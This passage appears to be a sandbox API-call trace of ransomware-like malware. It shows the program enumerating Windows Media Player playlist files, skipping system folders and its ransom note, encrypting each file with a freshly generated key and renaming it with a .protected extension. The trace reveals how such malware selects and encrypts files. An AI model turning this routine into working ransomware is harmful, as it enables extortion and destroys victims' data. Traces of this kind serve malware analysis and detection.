playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.945] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl") returned 137 [0084.945] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0084.945] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl") returned 137 [0084.945] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0084.945] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl") returned 137 [0084.945] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0084.945] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x4ff, lpOverlapped=0x0) returned 1 [0084.946] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.946] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x4ff, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x4ff, lpOverlapped=0x0) returned 1 [0084.946] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.946] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.946] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.946] CloseHandle (hObject=0x158) returned 1 [0084.947] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl.protected") returned 147 [0084.947] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\02_Music_added_in_the_last_month.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\02_music_added_in_the_last_month.wpl.protected")) returned 1 [0084.947] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.947] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0084.947] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0084.947] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0084.947] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0084.947] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0084.947] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0084.947] StrStrIW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0084.948] lstrcmpW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.948] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.948] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0084.948] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0084.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0084.948] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0084.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0084.948] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0084.949] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x4f3, lpOverlapped=0x0) returned 1 [0084.950] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.950] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x4f3, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x4f3, lpOverlapped=0x0) returned 1 [0084.950] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.950] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.950] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.950] CloseHandle (hObject=0x158) returned 1 [0084.950] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl.protected") returned 145 [0084.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\03_Music_rated_at_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\03_music_rated_at_4_or_5_stars.wpl.protected")) returned 1 [0084.952] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.952] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Windows") returned -1 [0084.952] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0084.952] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0084.952] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0084.952] lstrcmpiW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0084.952] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl") returned 138 [0084.952] StrStrIW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0084.952] lstrcmpW (lpString1="04_Music_played_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.952] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.952] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl") returned 138 [0084.953] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0084.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl") returned 138 [0084.953] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0084.953] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl") returned 138 [0084.953] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0084.953] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x504, lpOverlapped=0x0) returned 1 [0084.954] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffafc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.954] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x504, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x504, lpOverlapped=0x0) returned 1 [0084.955] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.955] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.955] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.955] CloseHandle (hObject=0x158) returned 1 [0084.955] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl.protected") returned 148 [0084.955] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl.protected")) returned 1 [0084.956] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.956] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Windows") returned -1 [0084.956] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0084.956] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0084.956] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0084.956] lstrcmpiW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0084.956] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0084.956] StrStrIW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0084.956] lstrcmpW (lpString1="05_Pictures_taken_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.956] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.956] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.956] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0084.956] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0084.956] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0084.956] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0084.956] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0084.956] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0084.956] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x31d, lpOverlapped=0x0) returned 1 [0084.957] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffce3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.957] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x31d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x31d, lpOverlapped=0x0) returned 1 [0084.958] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.958] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.958] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.958] CloseHandle (hObject=0x158) returned 1 [0084.958] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl.protected") returned 150 [0084.958] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl.protected")) returned 1 [0084.958] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.958] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0084.958] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0084.959] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0084.959] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0084.959] lstrcmpiW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0084.959] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0084.959] StrStrIW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0084.959] lstrcmpW (lpString1="06_Pictures_rated_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0084.959] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.959] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.962] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0084.962] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0084.962] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0084.962] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0084.962] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0084.962] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0084.962] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x311, lpOverlapped=0x0) returned 1 [0084.963] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffcef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.963] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x311, lpOverlapped=0x0) returned 1 [0084.963] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.963] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0084.963] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0084.963] CloseHandle (hObject=0x158) returned 1 [0084.963] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl.protected") returned 145 [0084.963] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl.protected")) returned 1 [0084.964] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.964] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Windows") returned -1 [0084.964] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Program Files") returned -1 [0084.964] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="Program Files (x86)") returned -1 [0084.964] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="$Recycle.bin") returned 1 [0084.964] lstrcmpiW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="System Volume Information") returned -1 [0084.964] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0084.964] StrStrIW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".protected") returned 0x0 [0084.964] lstrcmpW (lpString1="07_TV_recorded_in_the_last_week.wpl", lpString2="RESTORE_FILES.txt") returned -1 